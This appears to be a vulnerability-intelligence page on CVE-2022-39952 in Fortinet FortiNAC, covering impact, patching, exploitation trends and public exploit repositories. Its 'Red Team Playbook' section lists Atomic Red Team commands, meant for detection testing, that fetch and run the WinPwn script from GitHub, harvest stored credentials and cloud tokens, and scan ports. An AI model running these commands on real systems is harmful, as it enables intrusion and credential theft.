CVE-2022-39952
Overview
This vulnerability is an external control of file name or path issue affecting Fortinet FortiNAC's HTTP request handling component. The root cause lies in insufficient validation of user-supplied input used to specify file paths, enabling attackers to manipulate file system references. The flaw exists in multiple FortiNAC versions spanning 8.3.7 to 9.4.0, impacting the web interface's request processing logic.
Vulnerability Description
A external control of file name or path in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP request.
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network without user interaction (AV:N/AC:L/PR:N/UI:N) to execute arbitrary code or commands on the FortiNAC system. This enables full compromise of the affected device, potentially resulting in data breaches, disruption of network access control services, and lateral movement within the target environment. The critical severity (CVSS 9.8) reflects the high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Fortinet has released security updates addressing this vulnerability in FortiNAC versions 9.4.0 and later, as well as patches for affected earlier versions detailed in advisory FG-IR-22-300 available at https://fortiguard.com/psirt/FG-IR-22-300. Administrators should apply the vendor-provided patches promptly to all impacted FortiNAC versions. No workarounds are specified; refer to the Fortinet advisory for exact patch versions and installation instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Fortinet's FortiNAC arises from an external control of file names or paths, which can be exploited by an unauthenticated attacker. This flaw allows the attacker to craft specific HTTP requests that can lead to the execution of unauthorized code or commands on the affected systems. The issue is particularly concerning due to the nature of FortiNAC, which is designed to manage and secure network access control for devices within an organization. The ability to manipulate file paths or names poses a significant risk, as it can lead to arbitrary code execution, potentially compromising the integrity and confidentiality of the entire network.
Attack vectors for this vulnerability are primarily through crafted HTTP requests targeting the FortiNAC service. An attacker could leverage this flaw by sending specially designed requests that manipulate file paths, leading to the execution of malicious code on the server. This exploitation could occur remotely, making it accessible to threat actors without requiring physical access to the network. Scenarios may include an attacker using phishing techniques to lure an employee into clicking a malicious link or directly targeting the FortiNAC system through automated scripts that probe for vulnerable endpoints. The ease of exploitation, combined with the lack of authentication requirements, amplifies the threat posed by this vulnerability.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on FortiNAC for network security. Successful exploitation could lead to unauthorized access to sensitive data, disruption of network services, or even the establishment of persistent backdoors for future attacks. The potential for data breaches can result in significant financial losses, reputational damage, and regulatory penalties, especially in industries governed by strict data protection laws. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability is critical, necessitating immediate attention from security teams to mitigate the associated risks.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating FortiNAC to the latest versions that address this flaw is essential. Additionally, employing intrusion detection systems (IDS) can help identify and alert on suspicious HTTP requests that may indicate an attempted exploitation. Network segmentation can also limit the potential impact of an attack by isolating critical systems from less secure areas of the network. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability within Fortinet's FortiNAC presents a significant threat to network security, with the potential for unauthorized code execution through crafted HTTP requests. The ease of exploitation and the severe implications for data integrity and availability underscore the importance of prompt detection and mitigation strategies. Organizations must prioritize updating their systems, monitoring network traffic for anomalies, and adopting a proactive security posture to safeguard against such vulnerabilities. By doing so, they can better protect their assets and maintain the trust of their stakeholders in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-39952, accompanied by the continued availability and refinement of multiple proof-of-concept exploits on public repositories. Our telemetry indicates that adversaries are maintaining steady interest in leveraging this vulnerability, with no significant change in the rapidity of exploit adoption but a discernible uptick in overall activity. This persistence underscores the vulnerability’s criticality given its unauthenticated remote code execution capability and the broad range of affected FortiNAC versions. The presence of a Metasploit module further lowers the barrier for exploitation, potentially expanding the attacker base beyond highly skilled threat actors. Consequently, the threat level remains elevated, with a sustained risk of unauthorized system compromise and lateral movement within affected networks.
Update 2 — June 13, 2026
CSURFACE threat intelligence has observed a slight increase in exploitation attempts targeting CVE-2022-39952, reflected by a modest uptick in detection activity across our sensors. While the overall exploit adoption rate remains stable, the persistence of publicly available proof-of-concept code and an established Metasploit module continues to facilitate opportunistic attacks by a broader range of adversaries, including less sophisticated actors. This sustained activity underscores the critical nature of the vulnerability, particularly given its unauthenticated remote code execution capability and the wide array of affected FortiNAC versions. Although there is no evidence of a rapid surge in exploitation, the incremental rise in attempts signals ongoing interest from threat actors and maintains elevated risk for organizations running vulnerable FortiNAC deployments.
Update 3 — June 21, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2022-39952, reflected in a modest rise in telemetry activity and an elevated EPSS score nearing certainty of exploitation. This incremental uptick, while not indicative of a rapid surge, signals persistent adversary interest and ongoing opportunistic targeting of vulnerable FortiNAC deployments. The continued availability of multiple proof-of-concept exploits and an established Metasploit module lowers the barrier to entry for threat actors, including less sophisticated groups, thereby sustaining the vulnerability’s critical risk profile. Defenders should remain vigilant as this steady exploitation activity underscores the persistent threat posed by unauthenticated remote code execution in widely deployed FortiNAC versions, maintaining a high likelihood of compromise in unpatched environments.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortinac | All |
cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Fortinet FortiNAC keyUpload.jsp arbitrary file write
exploits/linux/http/fortinac_keyupload_file_write
|
Gwendal Guégniaud, Zach Hanley, jheysel-r7 | Unknown | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
horizon3ai/CVE-2022-39952
POC for CVE-2022-39952
|
horizon3ai | 265 | 53 | 2023-02-20 | View |
|
shiyeshu/CVE-2022-39952_webshell
Write Behinder_webshell to target using CVE-2022-39952
|
shiyeshu | 2 | 2 | 2023-02-22 | View |
|
Chocapikk/CVE-2022-39952
PoC for CVE-2022-39952 affecting Fortinet FortiNAC.
|
Chocapikk | 3 | 0 | 2023-02-26 | View |
|
dkstar11q/CVE-2022-39952-better
PoC for CVE-2022-39952 affecting Fortinet FortiNAC.
|
dkstar11q | 0 | 1 | 2023-03-27 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-39952 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-22-300 |